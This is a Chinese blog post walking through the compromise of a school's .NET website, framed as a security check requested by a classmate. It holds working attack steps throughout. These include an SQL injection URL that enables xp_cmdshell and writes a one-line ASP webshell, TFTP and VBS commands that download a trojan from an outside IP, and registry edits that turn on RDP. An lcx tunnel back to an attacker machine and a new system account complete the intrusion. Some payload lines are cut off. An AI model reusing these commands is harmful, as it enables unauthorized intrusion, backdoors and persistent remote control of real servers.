对母校.NET网站的渗透


前几天接到高中同学的电话说中学学校网站改版了,自己买了独立服务器,服务器放在学校机房的,当然服务器位于内网环境.程序是.NET做的,让我检 测下安全性。先找注射点。经过工具加手工的查找,发现了一个地方存在注射漏洞,运气很好!放到到啊D里面提示是SA权限如图1:




猜表只找到几个系统的表,尝试列目录也失败。马上放到NBSI里执行命令,失败。最后放入强悍的穿山甲进行检测,也是无法执行命令。用穿山甲检测下数据库的版本,发现是数据库是MSSQL2005的数据库。


如图2:




怪不得不能执行命令,MSSQL2005默认是关闭了XP_CMDSHELL的。现在我们需要开启它。


;--


返回正常,说明开启成功。放入工具一样执行命令无法回显。先前在找注射点的时候提交’爆出了网站的路径。这个路径我们用的上了。我们的思路是执行命
令后把结果输入到网站更目录的一个文件中,然后访问那个文件就可以看到内容了!这个也是渗透的技巧。我们来查看下主机开了哪些服务,提交:


返回正常,访问http://www.XXXX.com.cn/x.txt.显示了主机开放的服务如图3:




可以执行命令的嘛!,现在我们先拿下WEB服务器。路径我们也知道,先写个一句话木马进去。


http://www.XXXX.com.cn/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'echo%20^<^%execute%20request("k")%^>^%20>c:\inetpub\wwwroot\njezwz\x.asp';--


返回正常,访问一句话木马地址提示“类型不匹配: 'execute'
”。看来是写入正常的。马上拿出一句话木马客户端连接写入大马,提示写入失败。难道写进去的一句话木马问题?


http://www.xxxxxx.com.cn/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'type
c:


 


 


 


 


 




既然能上网我们就用TFTP下载一个ASP的木马到网站更目录吧。


-i 219.140.165.41 get muma.asp c:\inetpub\wwwroot\njezwz\xx.asp';--


看下TFTP服务器半天没的反映,看来不行,最后才知道TFTP那个文件被删除了。


那我们写个VBS的脚本到服务器里,用他来下载我们的木马吧!~这个脚本最好用一句话的VBS脚本,c


长了会出错的,导致无法下载。我们先上传一个脚本木马到一个空间中,注意木马格式改成TXT的。


Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^" sGet =
CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type =
1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile
^"c:\inetpub\wwwroot\njezwz\sql.asp^",2 >d:\z.vbs';--


正常写入,现在我们来执行下载我们的脚本木马。


d:\z.vbs';--


返回正常,访问木马地址,成功得到WEBSHELL。如图5:



现在我们来夺取服务器权限,通过查看数据库连接文件得到SA的密码,利用这个木马的XP_CMSHELL执行命令,先设定一个数据源。然后执行命令
发现,发现没有3389的端口。执行reg query
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server"发现fDenyTSConnections    REG_DWORD    0x1 值为1 为关闭3389
现在我们改成0就可以开启3389了。


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
/v fDenyTSConnections /t REG_DWORD /d 0 /f


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f


再次查看端口开放情况,发现3389已成功开启。马上上传一个LCX。在肉鸡一端使用LCX监听一个端口


肉鸡:d:\lcx.exe -listen 51 4000


渗透的主机:C:\Documents and Settings\All Users\Documents\lcx.exe -slave
219.140.165.41 51 127.0.0.1 3389


一会儿肉鸡那边就有反映了,我们加个系统帐户,马上在肉鸡上本地连接的4000端口。输入刚才加的账户成功登陆进服务器如图6:


posted on 2011-11-23 13:41  0xcc  阅读(418)  评论(0编辑  收藏  举报

导航